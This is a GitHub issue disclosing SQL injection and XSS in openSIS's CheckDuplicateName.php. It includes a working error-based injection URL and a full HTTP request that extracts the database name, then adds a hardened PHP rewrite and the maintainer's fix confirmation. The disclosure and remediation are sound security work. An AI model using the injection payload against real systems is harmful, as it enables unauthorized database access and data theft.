
XSS and Error based SQL injection in CheckDuplicateName.php #198

Closed
CP04042K opened this issue Sep 5, 2021 · 4 comments

Comments


CP04042K commented Sep 5, 2021

Description

Due to lack of protection, the parameters table_name, field_name, id and field_id can be abused to inject SQL queries to extract information from the database or for other SQLi tricks, and the parameter msg can be used to inject an XSS payload and steal the user's cookie (and even take over the user's account).

[Screenshot: 2021-09-05 14-45-56]

As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities.

Exploiting

[Screenshot: 2021-09-05 14-51-24]

Injection point:
HTTP://demo/CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg=

Below, I've shown how information can be extracted via SQL injection. XSS can be exploited by giving correct information in the other parameters and injecting JavaScript code in field_name or msg.

Request:

GET /CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg= HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:59:18 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 716
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlx

Solution

Add security functions such as sqlSecurityFilter to sanitize parameters before processing or printing out to the screen. For XSS, use htmlentities to properly encode the output.
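
As an added example (not openSIS's own code or the fix that was shipped), here is a hardened shape for this endpoint: table and column names come from a fixed allowlist (identifiers cannot be bound as prepared-statement parameters, so filtering them is not enough), the compared value is bound, and msg is HTML-encoded before it is returned. The parameter meanings, the $pdo connection and the column names in ALLOWED_TARGETS are assumptions.

```php
<?php
// Added example, not openSIS code. Assumed parameter meanings:
// table_name = table to search, field_name = column compared to val,
// field_id = primary-key column, id = record to exclude when editing,
// msg = text echoed back when a duplicate exists.

// Allowlist of tables/columns this endpoint may query. Column names are
// placeholders; the point is that identifiers are validated, never "sanitized".
const ALLOWED_TARGETS = [
    'api_info' => ['columns' => ['api_name'],          'pk' => 'id'],
    'students' => ['columns' => ['username', 'email'], 'pk' => 'student_id'],
];

function checkDuplicateName(PDO $pdo, array $params): array
{
    $table = (string)($params['table_name'] ?? '');
    $field = (string)($params['field_name'] ?? '');
    $pk    = (string)($params['field_id'] ?? '');

    // Anything outside the allowlist is rejected outright.
    if (!isset(ALLOWED_TARGETS[$table])
        || !in_array($field, ALLOWED_TARGETS[$table]['columns'], true)
        || $pk !== ALLOWED_TARGETS[$table]['pk']) {
        return ['ok' => false, 'error' => 'invalid target'];
    }

    // Identifiers are allowlisted and backtick-quoted; values are bound, never concatenated.
    $sql  = sprintf('SELECT COUNT(*) FROM `%s` WHERE `%s` = :val', $table, $field);
    $args = [':val' => (string)($params['val'] ?? '')];
    if (($params['id'] ?? '') !== '') {
        $sql .= sprintf(' AND `%s` <> :id', $pk);
        $args[':id'] = (int)$params['id'];
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($args);
    $dup = (int)$stmt->fetchColumn() > 0;

    // msg is attacker-controlled: encode it (quotes included) before it reaches the page.
    $msg = htmlspecialchars((string)($params['msg'] ?? ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return ['ok' => true, 'duplicate' => $dup, 'message' => $dup ? $msg : ''];
}

// $pdo is assumed to be the application's PDO connection with emulated prepares off.
// $pdo = new PDO('mysql:host=localhost;dbname=opensis', $user, $pass,
//                [PDO::ATTR_EMULATE_PREPARES => false]);
header('Content-Type: application/json; charset=utf-8');
echo json_encode(checkDuplicateName($pdo, $_GET));
```

Returning JSON and letting the client insert message as text (not innerHTML) keeps the encoding step from being bypassed by a later template change.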

@openSISAdmin (Member)

Fixed


VHAE04 commented Mar 3, 2022

nice

@Lebaominu

Great job, bro 🏆🏆


kimstars commented Mar 5, 2022

nice
